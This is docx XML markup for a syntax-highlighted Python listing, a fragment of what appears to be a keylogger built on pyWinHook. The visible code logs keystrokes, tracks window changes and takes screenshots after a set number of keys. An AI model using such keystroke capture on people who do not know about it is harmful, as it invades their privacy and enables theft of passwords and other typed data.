          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def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17" w:name="l570"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">570  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="917"/>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918" w:name="l571"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">571  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="918"/>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Ascii</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="919" w:name="l572"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">572  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="919"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="920" w:name="l573"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">573  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="920"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># If you want to show the "space" as a special key,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="921" w:name="l574"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">574  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="921"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># you must change the comparison (key &lt;32) to (key &lt;33)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="922" w:name="l575"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">575  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="922"/>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key </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">key </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>126</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23" w:name="l576"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">576  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="923"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">i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24" w:name="l577"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">577  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="924"/>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25" w:name="l578"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">578  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="925"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># With each press of RETURN adds a line break.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="926" w:name="l579"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">579  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="926"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">ckey </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'[RETURN]'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="927" w:name="l580"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">580  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="927"/>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28" w:name="l581"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">581  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="92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29" w:name="l582"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">582  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="92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30" w:name="l583"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">583  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="930"/>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31" w:name="l584"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">584  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="931"/>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32" w:name="l585"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">585  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="932"/>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hr</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933" w:name="l586"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">586  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="93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34" w:name="l587"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">587  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="934"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="935" w:name="l588"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">588  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="935"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Inc key counter and do screenshot if it's time</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="936" w:name="l589"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">589  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="936"/>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ckey</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;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37" w:name="l590"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">590  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="937"/>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938" w:name="l591"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">591  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="938"/>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939" w:name="l592"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">592  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="939"/>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40" w:name="l593"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">593  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="940"/>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941" w:name="l594"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">594  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="941"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="942" w:name="l595"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">595  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="942"/>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943" w:name="l596"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">596  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="943"/>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944" w:name="l597"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">597  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="944"/>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945" w:name="l598"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">598  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="945"/>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946" w:name="l599"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">599  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="946"/>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947" w:name="l600"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">600  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="947"/>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948" w:name="l601"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">601  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="948"/>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949" w:name="l602"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">602  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="949"/>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950" w:name="l603"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">603  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="950"/>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951" w:name="l604"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">604  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="951"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="952" w:name="l605"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">605  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="952"/>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953" w:name="l606"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">606  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="953"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="954" w:name="l607"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">607  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="954"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="955" w:name="l608"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">608  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="955"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># pyWinHook | Mouse events control. No mouse events are recorded except window changes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="956" w:name="l609"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">609  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="956"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>on_mouse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57" w:name="l610"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">610  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="957"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">global </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>old_event</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="958" w:name="l611"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">611  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="958"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="959" w:name="l612"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">612  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="959"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># If the user changes the window, register it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="960" w:name="l613"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">613  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="960"/>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31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">and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is not None:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="961" w:name="l614"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">614  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="961"/>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62" w:name="l615"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">615  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="962"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="963" w:name="l616"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">616  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="963"/>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64" w:name="l617"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">617  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="964"/>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965" w:name="l618"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">618  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="965"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="966" w:name="l619"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">619  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="966"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="967" w:name="l620"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">620  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="967"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># pyWinHook | Keyboard events control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="968" w:name="l621"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">621  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="968"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>on_keyboard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69" w:name="l622"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">622  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="969"/>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old_even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p>
